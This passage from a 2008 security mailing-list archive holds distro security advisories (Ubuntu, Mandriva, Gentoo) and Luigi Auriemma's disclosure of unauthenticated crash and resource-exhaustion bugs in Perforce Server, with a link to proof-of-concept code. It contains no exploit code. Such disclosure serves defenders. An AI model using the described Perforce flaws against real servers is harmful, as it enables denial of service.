9acdc7d7aef9203752040e7d7e5e66c8 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.10.1-0ubuntu2.1_amd64.deb Size/MD5: 2735950 250c738aa9d279a963edd7e05f70b82e http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.10.1-0ubuntu2.1_amd64.deb Size/MD5: 97482 80934a6ad6a87f6d9d83a854852a8fc8 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.10.1-0ubuntu2.1_i386.deb Size/MD5: 6308966 66e5b0c67e627fd4522b31b69ea7412c http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.10.1-0ubuntu2.1_i386.deb Size/MD5: 216470 46ce1c31dacf33ce573e34907c29fc52 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.10.1-0ubuntu2.1_i386.deb Size/MD5: 130052 c4c34cbb1f3ba84a6f860bda37d2438b http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.10.1-0ubuntu2.1_i386.deb Size/MD5: 2538582 8c10f0f7e2436f90b97c944626af7358 http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.10.1-0ubuntu2.1_i386.deb Size/MD5: 95458 96dbd649345ccf28d136ddad0bc37abd powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.10.1-0ubuntu2.1_powerpc.deb Size/MD5: 6706266 b9494ad95c9d8f745c07a4b03cab1968 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.10.1-0ubuntu2.1_powerpc.deb Size/MD5: 216502 e52c30e799d45d9d3bf91ed126450fe7 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.10.1-0ubuntu2.1_powerpc.deb Size/MD5: 154936 6a73224d57197990599c5d142a93f683 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.10.1-0ubuntu2.1_powerpc.deb Size/MD5: 2872602 51453f79dddd31e5de608c8dec4c9048 http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.10.1-0ubuntu2.1_powerpc.deb Size/MD5: 104428 1db598c653e13553032051bc798bb5cb sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.10.1-0ubuntu2.1_sparc.deb Size/MD5: 6216208 da4de3678bd78b3c9937f2f85836704d http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.10.1-0ubuntu2.1_sparc.deb Size/MD5: 216490 f9da62d91cd684225be9c5c2b14331fd http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.10.1-0ubuntu2.1_sparc.deb Size/MD5: 128202 4264e009fe03d3aab9ba1841314ce513 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.10.1-0ubuntu2.1_sparc.deb Size/MD5: 2552070 0cdcedf7d8716d3633158a2fc2add910 http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.10.1-0ubuntu2.1_sparc.deb Size/MD5: 94894 d338c0e9446143d2abccf48caf3a3f99 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.12.1-0ubuntu1.1.diff.gz Size/MD5: 48036 1305c81cab45e86f185787558f14cad2 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.12.1-0ubuntu1.1.dsc Size/MD5: 2086 d693e3bfcd22c01552b2e46af2ef3a61 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.12.1.orig.tar.gz Size/MD5: 31711081 48e74dcff2636e0e66dca303a91c9b93 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-common_2.12.1-0ubuntu1.1_all.deb Size/MD5: 11054864 cb8be3e829748afe1b1752b6d02abe6c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.12.1-0ubuntu1.1_amd64.deb Size/MD5: 6649232 d3dca779a3027a3e14a8c706dd3f5f30 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.12.1-0ubuntu1.1_amd64.deb Size/MD5: 143376 55e0d93294f69687d3b03cf99bb92e32 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.12.1-0ubuntu1.1_amd64.deb Size/MD5: 78222 041216f9e71e37f8bdbcb7d590774a98 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.12.1-0ubuntu1.1_amd64.deb Size/MD5: 2732316 e8f4df81d2e1ee6114e7191dfffe884a http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.12.1-0ubuntu1.1_amd64.deb Size/MD5: 18712 45681ea24febcdf441670619ff89e15f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.12.1-0ubuntu1.1_i386.deb Size/MD5: 6274290 ba9442d1736383e90a0dde247d6e119c http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.12.1-0ubuntu1.1_i386.deb Size/MD5: 143350 42b646fe4c3e8339e0d512b541e428fb http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.12.1-0ubuntu1.1_i386.deb Size/MD5: 68532 d0e1317e7ffc6e6171d20e4e7d14a2c2 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.12.1-0ubuntu1.1_i386.deb Size/MD5: 2520532 130647d772e4f13327aee570770f2c16 http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.12.1-0ubuntu1.1_i386.deb Size/MD5: 17066 ffe88bb399261addf7d6206290ff8815 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.12.1-0ubuntu1.1_powerpc.deb Size/MD5: 6657670 b8b653c41b564656a4e9ef5d3882f349 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.12.1-0ubuntu1.1_powerpc.deb Size/MD5: 143360 f55a0cbbd5cdbbf787046fdef8c81c34 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.12.1-0ubuntu1.1_powerpc.deb Size/MD5: 98806 54d900d851b2d3a0cbf860b04887738f http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.12.1-0ubuntu1.1_powerpc.deb Size/MD5: 2866636 a62c9fbbfe8fc8be3775d0927b0d7ed0 http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.12.1-0ubuntu1.1_powerpc.deb Size/MD5: 24232 e80987ecc42fcd7751aa254ea074c2a6 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.12.1-0ubuntu1.1_sparc.deb Size/MD5: 6166402 589524dfb5fe8beff850740e3941dcf1 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.12.1-0ubuntu1.1_sparc.deb Size/MD5: 143368 4b1014bc231eca798e9878f3d7d3d102 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.12.1-0ubuntu1.1_sparc.deb Size/MD5: 67160 8dc1187380fb7e8e1096bea2fa070de2 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.12.1-0ubuntu1.1_sparc.deb Size/MD5: 2539100 e7745a59c031ddd134cd7125de79bd9a http://security.ubuntu.com/ubuntu/pool/universe/e/evolution/evolution-plugins-experimental_2.12.1-0ubuntu1.1_sparc.deb Size/MD5: 16452 0c3fe63f5f1b911e80e71a609b8b1b61 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/46740b28/attachment.bin From aluigi at autistici.org Wed Mar 5 20:59:59 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Wed, 5 Mar 2008 21:59:59 +0100 Subject: [Full-disclosure] Multiple vulnerabilities in Perforce Server 2007.3/143793 Message-ID: <20080305215959.476b282a.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Perforce Server http://www.perforce.com Versions: <= 2007.3/143793 Platforms: Windows, Unix, Linux and Mac Bugs: NULL pointers, invalid memory access and endless loop Exploitation: remote Date: 05 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From vendor's website: "Perforce SCM (Software Configuration Management) versions and manages source code and digital assets for enterprises large and small." ####################################################################### ======= 2) Bugs ======= The Perforce server is affected by multiple vulnerabilities which allow any unauthenticated attacker to crash the server or consuming all its resources. The first type of vulnerabilities includes the NULL pointers generated by the absence of some parameters in the client's request and the lack of checks on the pointers returned by the functions which get these values from the packets. The commands affected by these NULL pointer vulnerabilities are the following: dm-FaultFile, dm-LazyCheck, dm-ResolvedFile, dm-OpenFile, crypto and possibly others. A secondary type of vulnerabilities is exploitable through the server-DiffFile and server-ReleaseFile commands, in this case the problem is caused by the 32 bit number provided by the client which is used as amount of elements in the initialization of an array. Another problem is then exploitable again with a malformed server-DiffFile command and allows to force the server in an endless loop which will cause its termination after having consumed all the memory and the resources of the system. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/perforces.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From security at mandriva.com Wed Mar 5 22:04:46 2008 From: security at mandriva.com (security at mandriva.com) Date: Wed, 05 Mar 2008 15:04:46 -0700 Subject: [Full-disclosure] [ MDVSA-2008:059 ] - Updated tcl packages fix vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:059 http://www.mandriva.com/security/ _______________________________________________________________________ Package : tcl Date : March 5, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A flaw in the Tcl regular expression handling engine was originally discovered by Will Drewry in the PostgreSQL database server's Tcl regular expression engine. This flaw can result in an infinite loop when processing certain regular expressions. The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4772 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: bde7e57d9dc7d568c0390ba3db4b5a3c 2007.0/i586/libtcl8.4-8.4.13-1.1mdv2007.0.i586.rpm d5a61fcda52e37a15c19e7d5c068656e 2007.0/i586/libtcl8.4-devel-8.4.13-1.1mdv2007.0.i586.rpm b243426d0d7f8d0a10ba70651feaef03 2007.0/i586/tcl-8.4.13-1.1mdv2007.0.i586.rpm 4f287e93256eaf7c84a0448ef2008020 2007.0/SRPMS/tcl-8.4.13-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: fa6beda37d3eaf2200e3b30af08751e9 2007.0/x86_64/lib64tcl8.4-8.4.13-1.1mdv2007.0.x86_64.rpm 46aa8b711feb915543ae2191da82bd01 2007.0/x86_64/lib64tcl8.4-devel-8.4.13-1.1mdv2007.0.x86_64.rpm 105fc5f39986cc6db6b4adb068baf425 2007.0/x86_64/tcl-8.4.13-1.1mdv2007.0.x86_64.rpm 4f287e93256eaf7c84a0448ef2008020 2007.0/SRPMS/tcl-8.4.13-1.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 5d5648b2bb457b157e1c30329f9891c7 2007.1/i586/libtcl8.4-8.4.14-1.1mdv2007.1.i586.rpm a98f64c60b59d32e54baf01275c85cbf 2007.1/i586/libtcl8.4-devel-8.4.14-1.1mdv2007.1.i586.rpm 62b8899728974799108afe5a5c39b34a 2007.1/i586/tcl-8.4.14-1.1mdv2007.1.i586.rpm 569e9de9c684040893255a5800b49037 2007.1/SRPMS/tcl-8.4.14-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 817d49b898cc17e360141894c922e6cd 2007.1/x86_64/lib64tcl8.4-8.4.14-1.1mdv2007.1.x86_64.rpm 4b277a29b3c41b37010e7c10f9644f7f 2007.1/x86_64/lib64tcl8.4-devel-8.4.14-1.1mdv2007.1.x86_64.rpm 70bbb7e664ec0fd8636faf6734e205a3 2007.1/x86_64/tcl-8.4.14-1.1mdv2007.1.x86_64.rpm 569e9de9c684040893255a5800b49037 2007.1/SRPMS/tcl-8.4.14-1.1mdv2007.1.src.rpm Mandriva Linux 2008.0: b474df935ae9405261886dc3983876e7 2008.0/i586/libtcl-devel-8.5a6-4.1mdv2008.0.i586.rpm 6e675eb728a9e61b139b1084fd451298 2008.0/i586/libtcl8.5-8.5a6-4.1mdv2008.0.i586.rpm 50111e483a4d70a7522038532f583e7d 2008.0/i586/tcl-8.5a6-4.1mdv2008.0.i586.rpm 42741c6d8cd19fb3907ceb97d934a6f6 2008.0/SRPMS/tcl-8.5a6-4.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 72982af24a4ed7c44ec46f8f4b593dee 2008.0/x86_64/lib64tcl-devel-8.5a6-4.1mdv2008.0.x86_64.rpm 3acb0a9ebc9aab51b6ff23d316721518 2008.0/x86_64/lib64tcl8.5-8.5a6-4.1mdv2008.0.x86_64.rpm 35a0827df193416c3ea6400309b4ae30 2008.0/x86_64/tcl-8.5a6-4.1mdv2008.0.x86_64.rpm 42741c6d8cd19fb3907ceb97d934a6f6 2008.0/SRPMS/tcl-8.5a6-4.1mdv2008.0.src.rpm Corporate 3.0: 45c8fbd95bebbad1b23f8bb2b15abe31 corporate/3.0/i586/expect-8.4.5-3.3.C30mdk.i586.rpm a45706ad62f18aa9a9ee532ece27349f corporate/3.0/i586/itcl-8.4.5-3.3.C30mdk.i586.rpm f448c6df20f64d967bf51cfc89139c61 corporate/3.0/i586/tcl-8.4.5-3.3.C30mdk.i586.rpm 508f120b23e7de9f91e68b6416360c57 corporate/3.0/i586/tcllib-8.4.5-3.3.C30mdk.i586.rpm 78a9d355932b0584734f927bf0bd21cb corporate/3.0/i586/tclx-8.4.5-3.3.C30mdk.i586.rpm dc15072dc76732f54e7effc67aa506e9 corporate/3.0/i586/tix-8.4.5-3.3.C30mdk.i586.rpm 1ad401d437998a447f8767eac0ed3f64 corporate/3.0/i586/tk-8.4.5-3.3.C30mdk.i586.rpm aca59d9916edfbf607b42a089c4e51f5 corporate/3.0/SRPMS/tcltk-8.4.5-3.3.C30mdk.src.rpm Corporate 3.0/X86_64: ab9dcf95b516f63779a48fa5da217e2c corporate/3.0/x86_64/expect-8.4.5-3.3.C30mdk.x86_64.rpm ccf0b17e73baed1a5597698501d4e16c corporate/3.0/x86_64/itcl-8.4.5-3.3.C30mdk.x86_64.rpm 7004fe82ceadb690a1c537dfffa8a602 corporate/3.0/x86_64/tcl-8.4.5-3.3.C30mdk.x86_64.rpm 8082288dd36eefe4f59f288636d86f52 corporate/3.0/x86_64/tcllib-8.4.5-3.3.C30mdk.x86_64.rpm 0d535ba37b8521ba2aed9ef62597b91f corporate/3.0/x86_64/tclx-8.4.5-3.3.C30mdk.x86_64.rpm 8eb5591457bdac01a6ebd5946bedbae2 corporate/3.0/x86_64/tix-8.4.5-3.3.C30mdk.x86_64.rpm 73d05959408f8daba243008033d1214c corporate/3.0/x86_64/tk-8.4.5-3.3.C30mdk.x86_64.rpm aca59d9916edfbf607b42a089c4e51f5 corporate/3.0/SRPMS/tcltk-8.4.5-3.3.C30mdk.src.rpm Corporate 4.0: 5a24c2fa2c3ef75bf5a6a9c8e8d9fde4 corporate/4.0/i586/expect-8.4.11-1.3.20060mlcs4.i586.rpm 2f76f932af5019692972d3fe8cbe942b corporate/4.0/i586/itcl-8.4.11-1.3.20060mlcs4.i586.rpm 059e9d9563b405543ccec50b92fa49e3 corporate/4.0/i586/iwidgets-8.4.11-1.3.20060mlcs4.i586.rpm 014aeb9e3dc0e3899fa4b5b5d8c7c704 corporate/4.0/i586/libtcl8.4-8.4.11-1.3.20060mlcs4.i586.rpm b35a6907bd77090e61fec7d65bbcf80a corporate/4.0/i586/libtk8.4-8.4.11-1.3.20060mlcs4.i586.rpm 01ca6961c52b0f1739a6aba00be421ea corporate/4.0/i586/tcl-8.4.11-1.3.20060mlcs4.i586.rpm db164a6464887403276021736452643c corporate/4.0/i586/tcllib-8.4.11-1.3.20060mlcs4.i586.rpm cf1c172d676d667dcd6c3b78e116fb2a corporate/4.0/i586/tclx-8.4.11-1.3.20060mlcs4.i586.rpm 80688ec696067190d438844dd1c1ebd4 corporate/4.0/i586/tix-8.4.11-1.3.20060mlcs4.i586.rpm 03dd827528301f02038d3696c36f1f86 corporate/4.0/i586/tk-8.4.11-1.3.20060mlcs4.i586.rpm 07140ab293a0f8bbd2e85bd89b489fd5 corporate/4.0/SRPMS/tcltk-8.4.11-1.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 232612b1f9135e5234bff7df706ab1df corporate/4.0/x86_64/expect-8.4.11-1.3.20060mlcs4.x86_64.rpm 078c7030c223c97d6ab8541452b63753 corporate/4.0/x86_64/itcl-8.4.11-1.3.20060mlcs4.x86_64.rpm 3ba3e8b7c99c760bc3a08a03132291e3 corporate/4.0/x86_64/iwidgets-8.4.11-1.3.20060mlcs4.x86_64.rpm bb86132cbefd68b96aa124ecb89f672c corporate/4.0/x86_64/lib64tcl8.4-8.4.11-1.3.20060mlcs4.x86_64.rpm 868ea1ba1a40899c20e7ccfb49683dfd corporate/4.0/x86_64/lib64tk8.4-8.4.11-1.3.20060mlcs4.x86_64.rpm e508a95776eb6df6173a696f4db57871 corporate/4.0/x86_64/tcl-8.4.11-1.3.20060mlcs4.x86_64.rpm 97a832f2d7ca0fe9a9784d2ed9800533 corporate/4.0/x86_64/tcllib-8.4.11-1.3.20060mlcs4.x86_64.rpm 1829edd678990445ddf160f1ba7953d3 corporate/4.0/x86_64/tclx-8.4.11-1.3.20060mlcs4.x86_64.rpm 16851058602125ff6b2a34ca0732ffb9 corporate/4.0/x86_64/tix-8.4.11-1.3.20060mlcs4.x86_64.rpm 094fb75804cd0458f073c41561f3b0e7 corporate/4.0/x86_64/tk-8.4.11-1.3.20060mlcs4.x86_64.rpm 07140ab293a0f8bbd2e85bd89b489fd5 corporate/4.0/SRPMS/tcltk-8.4.11-1.3.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHzu0hmqjQ0CJFipgRAu/NAJ9HlV2actdS3759zWv52I2E0WXfmACfZ2qG ECG/JHPiF9WC6uUiU76BKpw= =g0B/ -----END PGP SIGNATURE----- From py at gentoo.org Wed Mar 5 22:50:27 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Wed, 05 Mar 2008 23:50:27 +0100 Subject: [Full-disclosure] [ GLSA 200803-11 ] Vobcopy: Insecure temporary file creation Message-ID: <47CF23B3.9040808@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Vobcopy: Insecure temporary file creation Date: March 05, 2008 Bugs: #197578 ID: 200803-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Vobcopy uses temporary files in an insecure manner, allowing for a symlink attack. Background ========== Vobcopy is a tool for decrypting and copying DVD .vob files to a hard disk. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-video/vobcopy < 1.1.0 >= 1.1.0 Description =========== Joey Hess reported that vobcopy appends data to the file "/tmp/vobcopy.bla" in an insecure manner. Impact ====== A local attacker could exploit this vulnerability to conduct symlink attacks and append data to arbitrary files with the privileges of the user running Vobcopy. Workaround ========== There is no known workaround at this time. Resolution ========== All Vobcopy users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/vobcopy-1.1.0" References ========== [ 1 ] CVE-2007-5718 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5718 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-11.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzyOzuhJ+ozIKI5gRAsIRAJ96E0AKomLaheEMTTVpXv/sOxU77QCeORsz STMU3XJAKjrHur+Tihd5ZFU= =gtMw -----END PGP SIGNATURE----- From py at gentoo.org Wed Mar 5 23:01:11 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Thu, 06 Mar 2008 00:01:11 +0100 Subject: [Full-disclosure] [ GLSA 200803-12 ] Evolution: Format string vulnerability Message-ID: <47CF2637.5060903@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Evolution: Format string vulnerability Date: March 05, 2008 Bugs: #212272 ID: 200803-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A format string error has been discovered in Evolution, possibly resulting in the execution of arbitrary code. Background ========== Evolution is a GNOME groupware application. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 mail-client/evolution < 2.12.3-r1 >= 2.12.3-r1 Description =========== Ulf Harnhammar from Secunia Research discovered a format string error in the emf_multipart_encrypted() function in the file mail/em-format.c when reading certain data (e.g. the "Version:" field) from an encrypted e-mail. Impact ====== A remote attacker could entice a user to open a specially crafted encrypted e-mail, potentially resulting in the execution of arbitrary code with the privileges of the user running Evolution. Workaround ========== There is no known workaround at this time. Resolution ========== All Evolution users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-client/evolution-2.12.3-r1" References ========== [ 1 ] CVE-2008-0072 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0072 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-12.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzyY3uhJ+ozIKI5gRAlYJAJ0bS23P4HSxo13IpHXm89eYBg5CkQCggvwY UdMbR+mlmHFpuPT+wFmZIMw= =cJHw -----END PGP SIGNATURE----- From security at mandriva.com Wed Mar 5 22:57:42 2008 From: security at mandriva.com (security at mandriva.com) Date: Wed, 05 Mar 2008 15:57:42 -0700 Subject: [Full-disclosure] [ MDVSA-2008:060 ] - Updated Joomla! packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:060 http://www.mandriva.com/security/ _______________________________________________________________________ Package : joomla Date : March 5, 2008 Affected: 2007.0, 2007.1, 2008.0 _______________________________________________________________________ Problem Description: Several severe security issues were discovered in the Joomla! PHP-based content management system. These issues have been fixed in version 1.0.15 which is provided with this update. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6642 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6643 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6645 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 5f0adf1ca84dfa5252ca1a82ab865a75 2007.0/i586/joomla-1.0.15-0.1mdv2007.0.noarch.rpm f794badb8ac18137990f401eea61fcd5 2007.0/i586/joomla-administrator-1.0.15-0.1mdv2007.0.noarch.rpm ebd92dea41fbfe31328aa60b876e3d78 2007.0/SRPMS/joomla-1.0.15-0.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c4dfb0c218ecd4677db7cb73c2de1f14 2007.0/x86_64/joomla-1.0.15-0.1mdv2007.0.noarch.rpm 23d52be38d17120cde974adab8375d86 2007.0/x86_64/joomla-administrator-1.0.15-0.1mdv2007.0.noarch.rpm ebd92dea41fbfe31328aa60b876e3d78 2007.0/SRPMS/joomla-1.0.15-0.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 19a42a1369674164538db858af9405ff 2007.1/i586/joomla-1.0.15-0.1mdv2007.1.noarch.rpm 55525938eabff027c19bdd233cfc5bde 2007.1/i586/joomla-administrator-1.0.15-0.1mdv2007.1.noarch.rpm 4be5e56dec84c4d0f34c8363b68e68a3 2007.1/SRPMS/joomla-1.0.15-0.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 7d78e93c570396f2db0ebc12e9201dc5 2007.1/x86_64/joomla-1.0.15-0.1mdv2007.1.noarch.rpm c4854df8790fc8eabe4b0024e72f174a 2007.1/x86_64/joomla-administrator-1.0.15-0.1mdv2007.1.noarch.rpm 4be5e56dec84c4d0f34c8363b68e68a3 2007.1/SRPMS/joomla-1.0.15-0.1mdv2007.1.src.rpm Mandriva Linux 2008.0: fa7eb9a56f6b0b3d7e143e467baf181e 2008.0/i586/joomla-1.0.15-0.1mdv2008.0.noarch.rpm ec3fb80329c9a2c7bd14af9a39a8ed8e 2008.0/i586/joomla-administrator-1.0.15-0.1mdv2008.0.noarch.rpm 1c09f30544ae0ddcfad1b19eaab5400d 2008.0/SRPMS/joomla-1.0.15-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9c05dd8c7fdc9c9c31490b40594c0c74 2008.0/x86_64/joomla-1.0.15-0.1mdv2008.0.noarch.rpm 1bffce8962d7208a28af7bbcc6380d96 2008.0/x86_64/joomla-administrator-1.0.15-0.1mdv2008.0.noarch.rpm 1c09f30544ae0ddcfad1b19eaab5400d 2008.0/SRPMS/joomla-1.0.15-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHzvqImqjQ0CJFipgRAjvlAJwIKwHr0x5/6wiPTmK3B0r7Iob4eQCbB66Z eFHu6uuC341v9eOjiKx+Vyg= =xIQy -----END PGP SIGNATURE----- From ivanhec at gmail.com Wed Mar 5 23:09:53 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 10:09:53 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" Message-ID: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html From jamie at canonical.com Wed Mar 5 22:46:06 2008 From: jamie at canonical.com (Jamie Strandboge) Date: Wed, 5 Mar 2008 17:46:06 -0500 Subject: [Full-disclosure] [USN-584-1] OpenLDAP vulnerabilities Message-ID: <20080305224606.GB9735@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-584-1 March 05, 2008 openldap2.2, openldap2.3 vulnerabilities CVE-2007-6698, CVE-2008-0658 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: slapd 